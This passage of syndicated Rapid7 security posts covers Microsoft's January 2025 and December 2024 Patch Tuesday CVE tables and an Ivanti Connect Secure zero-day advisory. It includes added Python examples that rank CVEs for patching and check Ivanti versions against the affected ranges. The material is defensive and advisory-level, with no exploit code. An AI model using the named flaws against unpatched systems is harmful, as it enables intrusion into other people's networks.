CVE-2025-21173 .NET Elevation of Privilege Vulnerability No No 7.3

ESU Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21307 Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability No No 9.8
CVE-2025-21298 Windows OLE Remote Code Execution Vulnerability No No 9.8
CVE-2025-21411 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21413 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21233 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21236 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21237 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21243 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21244 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21252 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21266 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21282 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21302 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21303 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21306 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21273 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21286 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21305 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21339 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21246 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21417 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21250 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21240 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21238 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21223 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21409 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21245 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21293 Active Directory Domain Services Elevation of Privilege Vulnerability No No 8.8
CVE-2025-21297 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2025-21309 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2025-21295 SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability No No 8.1
CVE-2025-21294 Microsoft Digest Authentication Remote Code Execution Vulnerability No No 8.1
CVE-2025-21287 Windows Installer Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21378 Windows CSC Service Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21281 Microsoft COM for Windows Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21389 Windows upnphost.dll Denial of Service Vulnerability No No 7.5
CVE-2025-21300 Windows upnphost.dll Denial of Service Vulnerability No No 7.5
CVE-2025-21276 Windows MapUrlToZone Denial of Service Vulnerability No No 7.5
CVE-2025-21218 Windows Kerberos Denial of Service Vulnerability No No 7.5
CVE-2025-21220 Microsoft Message Queuing Information Disclosure Vulnerability No No 7.5
CVE-2025-21251 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21270 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21277 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21285 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21289 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21290 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21230 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-21231 IP Helper Denial of Service Vulnerability No No 7.5
CVE-2025-21296 BranchCache Remote Code Execution Vulnerability No No 7.5
CVE-2025-21331 Windows Installer Elevation of Privilege Vulnerability No No 7.3
CVE-2025-21211 Secure Boot Security Feature Bypass Vulnerability No No 6.8
CVE-2024-7344 Cert CC: CVE-2024-7344 Howyar Taiwan Secure Boot Bypass No No 6.7
CVE-2025-21249 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21255 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21258 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21260 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21263 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21265 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21327 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21341 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21226 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21227 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21228 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21229 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21232 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21256 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21261 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21310 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21324 Windows Digital Media Elevation of Privilege Vulnerability No No 6.6
CVE-2025-21308 Windows Themes Spoofing Vulnerability No Yes 6.5
CVE-2025-21217 Windows NTLM Spoofing Vulnerability No No 6.5
CVE-2025-21272 Windows COM Server Information Disclosure Vulnerability No No 6.5
CVE-2025-21288 Windows COM Server Information Disclosure Vulnerability No No 6.5
CVE-2025-21278 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability No No 6.2
CVE-2025-21242 Windows Kerberos Information Disclosure Vulnerability No No 5.9
CVE-2025-21336 Windows Cryptographic Information Disclosure Vulnerability No No 5.6
CVE-2025-21316 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21318 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21319 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21320 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21321 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21274 Windows Event Tracing Denial of Service Vulnerability No No 5.5
CVE-2025-21374 Windows CSC Service Information Disclosure Vulnerability No No 5.5
CVE-2025-21215 Secure Boot Security Feature Bypass Vulnerability No No 4.6
CVE-2025-21213 Secure Boot Security Feature Bypass Vulnerability No No 4.6
CVE-2025-21269 Windows HTML Platforms Security Feature Bypass Vulnerability No No 4.3
CVE-2025-21268 MapUrlToZone Security Feature Bypass Vulnerability No No 4.3
CVE-2025-21329 MapUrlToZone Security Feature Bypass Vulnerability No No 4.3
CVE-2025-21328 MapUrlToZone Security Feature Bypass Vulnerability No No 4.3
CVE-2025-21189 MapUrlToZone Security Feature Bypass Vulnerability No No 4.3
CVE-2025-21332 MapUrlToZone Security Feature Bypass Vulnerability No No 4.3
CVE-2025-21210 Windows BitLocker Information Disclosure Vulnerability No No 4.2
CVE-2025-21214 Windows BitLocker Information Disclosure Vulnerability No No 4.2
CVE-2025-21312 Windows Smart Card Reader Information Disclosure Vulnerability No No 2.4

ESU Windows Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21338 GDI+ Remote Code Execution Vulnerability No No 7.8

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21187 Microsoft Power Automate Remote Code Execution Vulnerability No No 7.8

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21385 Microsoft Purview Information Disclosure Vulnerability No No 8.8
CVE-2025-21363 Microsoft Word Remote Code Execution Vulnerability No No 7.8
CVE-2025-21344 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.8
CVE-2025-21361 Microsoft Outlook Remote Code Execution Vulnerability No No 7.8
CVE-2025-21345 Microsoft Office Visio Remote Code Execution Vulnerability No No 7.8
CVE-2025-21356 Microsoft Office Visio Remote Code Execution Vulnerability No No 7.8
CVE-2025-21365 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-21402 Microsoft Office OneNote Remote Code Execution Vulnerability No No 7.8
CVE-2025-21364 Microsoft Excel Security Feature Bypass Vulnerability No No 7.8
CVE-2025-21354 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21362 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21360 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21366 Microsoft Access Remote Code Execution Vulnerability No Yes 7.8
CVE-2025-21395 Microsoft Access Remote Code Execution Vulnerability No Yes 7.8
CVE-2025-21186 Microsoft Access Remote Code Execution Vulnerability No Yes 7.8
CVE-2025-21348 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.2
CVE-2025-21346 Microsoft Office Security Feature Bypass Vulnerability No No 7.1
CVE-2025-21357 Microsoft Outlook Remote Code Execution Vulnerability No No 6.7
CVE-2025-21393 Microsoft SharePoint Server Spoofing Vulnerability No No 6.3

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21311 Windows NTLM V1 Elevation of Privilege Vulnerability No No 9.8
CVE-2025-21239 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21241 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21248 Windows Telephony Service Remote Code Execution Vulnerability No No 8.8
CVE-2025-21292 Windows Search Service Elevation of Privilege Vulnerability No No 8.8
CVE-2025-21291 Windows Direct Show Remote Code Execution Vulnerability No No 8.8
CVE-2025-21224 Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability No No 8.1
CVE-2025-21370 Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21234 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21235 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21335 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Yes No 7.8
CVE-2025-21333 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Yes No 7.8
CVE-2025-21334 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Yes No 7.8
CVE-2025-21382 Windows Graphics Component Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21271 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21275 Windows App Package Installer Elevation of Privilege Vulnerability No Yes 7.8
CVE-2025-21304 Microsoft DWM Core Library Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21315 Microsoft Brokering File System Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21372 Microsoft Brokering File System Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21326 Internet Explorer Remote Code Execution Vulnerability No No 7.8
CVE-2025-21343 Windows Web Threat Defense User Service Information Disclosure Vulnerability No No 7.5
CVE-2025-21330 Windows Remote Desktop Services Denial of Service Vulnerability No No 7.5
CVE-2025-21207 Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability No No 7.5
CVE-2025-21299 Windows Kerberos Security Feature Bypass Vulnerability No No 7.1
CVE-2025-21314 Windows SmartScreen Spoofing Vulnerability No No 6.5
CVE-2025-21313 Windows Security Account Manager (SAM) Denial of Service Vulnerability No No 6.5
CVE-2025-21301 Windows Geolocation Service Information Disclosure Vulnerability No No 6.5
CVE-2025-21193 Active Directory Federation Server Spoofing Vulnerability No No 6.5
CVE-2025-21202 Windows Recovery Environment Agent Elevation of Privilege Vulnerability No No 6.1
CVE-2025-21225 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability No No 5.9
CVE-2025-21257 Windows WLAN AutoConfig Service Information Disclosure Vulnerability No No 5.5
CVE-2025-21340 Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability No No 5.5
CVE-2025-21280 Windows Virtual Trusted Platform Module Denial of Service Vulnerability No No 5.5
CVE-2025-21284 Windows Virtual Trusted Platform Module Denial of Service Vulnerability No No 5.5
CVE-2025-21317 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21323 Windows Kernel Memory Information Disclosure Vulnerability No No 5.5
CVE-2025-21219 MapUrlToZone Security Feature Bypass Vulnerability No No 4.3
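The summary tables on this page are flattened to one row per line: CVE id, title, Exploited?, Publicly disclosed?, CVSSv3 base score (or N/A). The Python below is an added example, not Rapid7’s code, that parses rows in that shape and orders them the way the post’s own commentary prioritizes: exploited in the wild first, then publicly disclosed, then by base score. The sample excerpt is a handful of rows copied from the tables above; section headings are recognized by their trailing word "vulnerabilities", which is an assumption about this page’s layout. One caveat the post itself illustrates: CVSS base score is not Microsoft’s severity rating (this month’s zero-days are not rated critical, and the 9.8 RCEs are not zero-days), so the score is only a tiebreaker here.

```python
"""Parse flattened Patch Tuesday summary-table rows and rank them for patching."""
import re

# One row: CVE id, free-text title, Exploited?, Publicly disclosed?, CVSSv3 or N/A.
_ROW_RE = re.compile(
    r"^(CVE-\d{4}-\d{4,})\s+(.+?)\s+(Yes|No)\s+(Yes|No)\s+(\d+(?:\.\d+)?|N/A)$"
)
_HEADER_PREFIX = "CVE Title Exploited?"


def parse_summary_tables(text: str) -> list:
    """Return one dict per row, tagged with the section heading it sits under."""
    rows, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(_HEADER_PREFIX):
            continue
        m = _ROW_RE.match(line)
        if m is None:
            if line.endswith("vulnerabilities"):
                section = line            # e.g. "ESU Windows vulnerabilities"
            continue                      # anything else is prose; ignore it
        cve, title, exploited, disclosed, score = m.groups()
        rows.append({
            "cve": cve,
            "title": title,
            "section": section,
            "exploited": exploited == "Yes",
            "disclosed": disclosed == "Yes",
            "cvss": None if score == "N/A" else float(score),
        })
    return rows


def prioritize(rows: list) -> list:
    """Exploited first, then publicly disclosed, then CVSS descending, then CVE id.

    CVSS base score is not Microsoft's severity rating and says nothing about
    whether anyone is actually exploiting the bug, so it is only a tiebreaker.
    Rows with no score (N/A) sort last within their group.
    """
    def key(r):
        score = -1.0 if r["cvss"] is None else r["cvss"]
        return (not r["exploited"], not r["disclosed"], -score, r["cve"])
    return sorted(rows, key=key)


# Excerpt of rows copied from the summary tables on this page.
SAMPLE_TABLES = """\
Developer Tools Mariner vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-32002 HackerOne: CVE-2023-32002 Node.js Module._load() policy Remote Code Execution Vulnerability No No N/A

ESU Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21307 Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability No No 9.8
CVE-2025-21298 Windows OLE Remote Code Execution Vulnerability No No 9.8
CVE-2025-21308 Windows Themes Spoofing Vulnerability No Yes 6.5

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21333 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Yes No 7.8
CVE-2025-21275 Windows App Package Installer Elevation of Privilege Vulnerability No Yes 7.8
"""


def demo() -> list:
    """CVE ids from the excerpt in patch-priority order."""
    return [r["cve"] for r in prioritize(parse_summary_tables(SAMPLE_TABLES))]


if __name__ == "__main__":
    for r in prioritize(parse_summary_tables(SAMPLE_TABLES)):
        flags = ("EXPLOITED " if r["exploited"] else "") + ("DISCLOSED " if r["disclosed"] else "")
        print(f"{r['cve']}  {r['cvss'] or 'N/A':>4}  {flags}[{r['section']}] {r['title']}")
```

On the excerpt the order comes out as the exploited Hyper-V VSP bug, then the two publicly disclosed issues, then the two 9.8 RCEs, with the unscored Node.js row last. Feeding the whole page through `parse_summary_tables` gives the same ranking across every table, including the ESU tables, which is usually the first question an asset owner asks.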

CVE-2025-0282: Ivanti Connect Secure zero-day exploited in the wild

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/01/08/etr-cve-2025-0282-ivanti-connect-secure-zero-day-exploited-in-the-wild/

CVE-2025-0282: Ivanti Connect Secure zero-day exploited in the wild

On Wednesday, January 8, 2025, Ivanti disclosed two CVEs affecting Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. CVE-2025-0282 is a stack-based buffer overflow vulnerability that allows remote, unauthenticated attackers to execute code on the target device. CVE-2025-0283 is a stack-based buffer overflow that allows local authenticated attackers to escalate privileges on the device.

Ivanti’s advisory indicates that CVE-2025-0282 has been exploited in the wild against a limited number of Connect Secure devices. Per the vendor, Ivanti Policy Secure and Neurons for ZTA are not known to have been exploited in the wild at time of disclosure. Google’s Mandiant division and Microsoft’s Threat Intelligence Center (MSTIC) are credited with the discovery of the two issues, which almost certainly means further intelligence will be released soon on one or more zero-day threat campaigns targeting Ivanti devices.

Ivanti has also published a short blog post on the new CVEs.

Mitigation guidance

The following products and versions are vulnerable to CVE-2025-0282:

  • Ivanti Connect Secure 22.7R2 through 22.7R2.4
  • Ivanti Policy Secure 22.7R1 through 22.7R1.2
  • Ivanti Neurons for ZTA 22.7R2 through 22.7R2.3

The following products and versions are vulnerable to CVE-2025-0283:

  • Ivanti Connect Secure 22.7R2.4 and prior, 9.1R18.9 and prior
  • Ivanti Policy Secure 22.7R1.2 and prior
  • Ivanti Neurons for ZTA 22.7R2.3 and prior

Ivanti has a full table of affected versions and corresponding solution estimates in its advisory. As of 1 PM ET on Wednesday, January 8, patches are available for both CVEs in Ivanti Connect Secure (22.7R2.5), but the CVEs are unpatched in Ivanti Policy Secure and Neurons for ZTA (patches appear to be expected January 21, 2025, per the advisory).
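The affected ranges above mix "X through Y" and "X and prior" wording, and Ivanti's version strings (22.7R2.4, 9.1R18.9) do not sort correctly as plain strings, so a naive inventory comparison gets them wrong. The following is an added example, not Rapid7's or Ivanti's code: it parses those version strings into comparable tuples and maps each product/version pair in an asset inventory to the CVEs the advisory summary assigns to it. The range table is taken literally from the lists above; "and prior" is modelled as having no lower bound, which is exactly what the summary states and no more. The function names, the `AffectedRange` type and the inventory rows are this example's own constructions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Ivanti version strings look like "22.7R2.4" or "9.1R18.9": major.minor, an "R"
# release number, and an optional trailing patch number. Comparing them as integer
# tuples gives the ordering that "X through Y" and "X and prior" depend on.
Version = Tuple[int, int, int, int]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$")


def parse_version(text: str) -> Version:
    """Turn '22.7R2' into (22, 7, 2, 0) and '22.7R2.4' into (22, 7, 2, 4)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


@dataclass(frozen=True)
class AffectedRange:
    product: str
    cve: str
    low: Optional[Version]  # inclusive lower bound; None models "... and prior"
    high: Version           # inclusive upper bound

    def contains(self, version: Version) -> bool:
        return (self.low is None or self.low <= version) and version <= self.high


def _r(product: str, cve: str, low: Optional[str], high: str) -> AffectedRange:
    return AffectedRange(product, cve, parse_version(low) if low else None, parse_version(high))


# Affected ranges exactly as the advisory summary above lists them.
AFFECTED: List[AffectedRange] = [
    _r("Ivanti Connect Secure", "CVE-2025-0282", "22.7R2", "22.7R2.4"),
    _r("Ivanti Policy Secure", "CVE-2025-0282", "22.7R1", "22.7R1.2"),
    _r("Ivanti Neurons for ZTA", "CVE-2025-0282", "22.7R2", "22.7R2.3"),
    _r("Ivanti Connect Secure", "CVE-2025-0283", None, "22.7R2.4"),
    _r("Ivanti Connect Secure", "CVE-2025-0283", None, "9.1R18.9"),
    _r("Ivanti Policy Secure", "CVE-2025-0283", None, "22.7R1.2"),
    _r("Ivanti Neurons for ZTA", "CVE-2025-0283", None, "22.7R2.3"),
]


def affected_cves(product: str, version_text: str) -> List[str]:
    """Sorted list of the advisory's CVEs that apply to this product and version."""
    version = parse_version(version_text)
    return sorted({r.cve for r in AFFECTED if r.product == product and r.contains(version)})


def triage(inventory: List[Tuple[str, str]]) -> Dict[Tuple[str, str], List[str]]:
    """Map each (product, version) pair of an inventory to the CVEs it carries."""
    return {(p, v): affected_cves(p, v) for p, v in inventory}


if __name__ == "__main__":
    sample_inventory = [  # constructed sample assets, not real devices
        ("Ivanti Connect Secure", "22.7R2.4"),  # inside both affected ranges
        ("Ivanti Connect Secure", "22.7R2.5"),  # the fixed release named above
        ("Ivanti Connect Secure", "9.1R18.9"),  # legacy train: CVE-2025-0283 only
        ("Ivanti Policy Secure", "22.7R1.1"),
    ]
    for (product, version), cves in triage(sample_inventory).items():
        print(f"{product} {version}: {', '.join(cves) or 'not in an affected range'}")
```

Two caveats when using this against a real inventory: product names must be normalised to the strings the table uses, and the ranges here come only from the summary lists above, so the vendor's full affected-version table remains the authority for anything the summary does not mention.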

Customers should apply available Ivanti Connect Secure patches immediately, without waiting for a typical patch cycle to occur. Ivanti’s advisory notes that “Exploitation of CVE-2025-0282 can be identified by the Integrity Checker Tool (ICT). We strongly advise all customers to closely monitor their internal and external ICT as a part of a robust and layered approach to cybersecurity to ensure the integrity and security of the entire network infrastructure.”

For the latest information, please refer to the vendor advisory.

Rapid7 customers

Our VM engineering team is researching options for coverage of CVE-2025-0282 and CVE-2025-0283 in Ivanti Connect Secure and expects vulnerability checks to be available to InsightVM and Nexpose customers no later than Thursday, January 9, 2025.

Patch Tuesday – December 2024

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2024/12/10/patch-tuesday-december-2024/

Microsoft is addressing 70 vulnerabilities this December 2024 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation and public disclosure for one of the vulnerabilities published today, and this is reflected in a CISA KEV entry. For the third month in a row, Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today sees the publication of 16 critical remote code execution (RCE) vulnerabilities, which is more than usual. Two browser vulnerabilities have already been published separately this month, and are not included in the total.

Common Log File System: zero-day EoP

This month’s zero-day vulnerability is CVE-2024-49138, an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) driver, a general-purpose Windows logging service that can be used by software clients running in user-mode or kernel-mode. Exploitation leads to SYSTEM privileges, and if this all sounds familiar, it should.

There have been a series of zero-day elevation of privilege vulnerabilities in CLFS over the past few years. Past offenders are CVE-2022-24521, CVE-2023-23376, CVE-2022-37969, and CVE-2023-28252; today’s addition of CVE-2024-49138 is the first CLFS zero-day vulnerability which Microsoft has published in 2024. Although the advisory doesn’t provide much detail on the means of exploitation, the weakness is CWE-122: Heap-based Buffer Overflow, which most commonly leads to crashes/denial of service, but can also lead to code execution.

Ransomware authors who have abused previous CLFS vulnerabilities will be only too pleased to get their hands on a fresh one. Expect more CLFS zero-day vulnerabilities to emerge in the future, unless Microsoft decides to perform a full replacement of the aging CLFS codebase instead of offering spot fixes for specific flaws. Patches are available for all versions of Windows.

Groups of critical RCE

Patterns emerge when we consider the 16 critical RCE vulnerabilities published today as a whole, which might somewhat reduce the level of alarm that unusually large number might otherwise cause weary defenders.

LDAP: critical RCE

A trio of Windows LDAP critical RCE vulnerabilities receive patches this month, including CVE-2024-49112, whose CVSSv3 base score of 9.8 is the highest of any vulnerability Microsoft has published today. Exploitation is via a specially crafted set of LDAP calls and leads to code execution within the context of the LDAP service; although the advisory doesn’t specify, the LDAP service runs in a SYSTEM context. Microsoft advises defenders who still permit domain controllers to receive inbound RPC calls from untrusted networks or to access the internet to stop doing that.

LSASS: critical RCE

Another potential cause for concern this month: CVE-2024-49126 is a critical RCE in the Local Security Authority Subsystem Service (LSASS). Exploitation could potentially be carried out remotely, and the attacker needs no privileges, nor does the user need to perform any action; the only silver lining is that an attacker must win a race condition. Although the advisory says that code execution would be in the context of the server’s account, it might be safest to assume that code execution would be in a SYSTEM context.

Hyper-V: container escape

CVE-2024-49117 describes a container escape for Hyper-V; exploitation requires that the attacker make specially crafted file operation requests on the virtual machine (VM) to hardware resources on the VM, which could result in remote code execution on the hypervisor. The FAQ on the advisory sets out that no special privileges are required in the context of the VM, so any level of access is enough to break free from the VM. We also learn that the container escape could be lateral, where an attacker moves from one VM to another, rather than to the hypervisor.

Remote Desktop Services: 8 critical RCEs

All eight critical RCE vulnerabilities in Remote Desktop Services published today (e.g. CVE-2024-49106) share a number of similarities: they have identical CVSS vectors, exploitation requires that an attacker win a race condition, and the same research group is credited in each case.
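The grouping this section performs by hand, stepping through the critical RCEs component by component, is the kind of triage that is worth automating when a month delivers 16 of them. The following is an added example and not Rapid7's tooling: it parses rows in the format of the summary tables further down this post (CVE, title, exploited, publicly disclosed, CVSSv3 score), ranks them exploited-first, then disclosed, then by score, and buckets the RCEs by affected component so clusters like the eight Remote Desktop Services entries stand out. The sample rows are copied from this post's tables (a subset, not the full set); the `Finding` type and all function names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One row of a Patch Tuesday summary table as it appears in this post:
#   CVE  Title  Exploited?  Publicly disclosed?  CVSSv3 base score
_ROW_RE = re.compile(
    r"^(?P<cve>CVE-\d{4}-\d+)\s+(?P<title>.+?)\s+(?P<exploited>Yes|No)\s+"
    r"(?P<disclosed>Yes|No)\s+(?P<cvss>\d+(?:\.\d+)?|N/A)$"
)

# Vulnerability classes Microsoft uses as title suffixes; removing one leaves the component.
_VULN_CLASSES = (
    "Remote Code Execution", "Elevation of Privilege", "Denial of Service",
    "Information Disclosure", "Security Feature Bypass", "Spoofing",
)


@dataclass(frozen=True)
class Finding:
    cve: str
    component: str
    vuln_class: str
    exploited: bool
    disclosed: bool
    cvss: Optional[float]  # None when the table says N/A


def split_title(title: str) -> Tuple[str, str]:
    """'Windows Hyper-V Remote Code Execution Vulnerability' -> ('Windows Hyper-V', 'Remote Code Execution')."""
    for cls in _VULN_CLASSES:
        suffix = f" {cls} Vulnerability"
        if title.endswith(suffix):
            return title[: -len(suffix)], cls
    return title, "Other"  # e.g. Chromium rows, which carry no Microsoft class suffix


def parse_rows(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line in text.strip().splitlines():
        m = _ROW_RE.match(line.strip())
        if not m:
            continue  # header line or anything that is not a table row
        component, vuln_class = split_title(m["title"])
        cvss = None if m["cvss"] == "N/A" else float(m["cvss"])
        findings.append(Finding(m["cve"], component, vuln_class,
                                m["exploited"] == "Yes", m["disclosed"] == "Yes", cvss))
    return findings


def rank(findings: List[Finding]) -> List[Finding]:
    """Exploited-in-the-wild first, then publicly disclosed, then CVSS descending (N/A last)."""
    return sorted(findings, key=lambda f: (not f.exploited, not f.disclosed,
                                           -(f.cvss if f.cvss is not None else 0.0)))


def group_by_component(findings: List[Finding],
                       vuln_class: str = "Remote Code Execution") -> Dict[str, List[str]]:
    """Bucket the CVEs of one vulnerability class by the component they affect."""
    groups: Dict[str, List[str]] = {}
    for f in findings:
        if f.vuln_class == vuln_class:
            groups.setdefault(f.component, []).append(f.cve)
    return groups


# Rows copied from this post's summary tables (a subset, for illustration).
SAMPLE_ROWS = """
CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-49138 Windows Common Log File System Driver Elevation of Privilege Vulnerability Yes Yes 7.8
CVE-2024-49112 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability No No 9.8
CVE-2024-49127 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability No No 8.1
CVE-2024-49117 Windows Hyper-V Remote Code Execution Vulnerability No No 8.8
CVE-2024-49106 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49108 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49126 Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability No No 8.1
CVE-2024-12053 Chromium: CVE-2024-12053 Type Confusion in V8 No No N/A
"""

if __name__ == "__main__":
    findings = parse_rows(SAMPLE_ROWS)
    for f in rank(findings):
        score = "N/A" if f.cvss is None else f"{f.cvss}"
        flags = ("exploited " if f.exploited else "") + ("disclosed" if f.disclosed else "")
        print(f"{f.cve} {score:>4} {f.component} [{f.vuln_class}] {flags}")
    for component, cves in group_by_component(findings).items():
        print(f"{component}: {len(cves)} RCE ({', '.join(cves)})")
```

The ranking deliberately puts Microsoft's exploited and disclosed flags ahead of the CVSS score, which is why the 7.8 CLFS zero-day sorts above the 9.8 LDAP entry; severity ratings such as "critical" are Microsoft's own assessment and are not derived from the score, so they are not inferred here.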

Microsoft lifecycle update

There are no significant Microsoft product lifecycle transitions this month.

Summary charts

[Three summary chart images from the original post; only their alt text ("Patch Tuesday - December 2024") survives here.]

Summary tables

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-49041 Microsoft Edge (Chromium-based) Spoofing Vulnerability No No 4.3
CVE-2024-12053 Chromium: CVE-2024-12053 Type Confusion in V8 No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
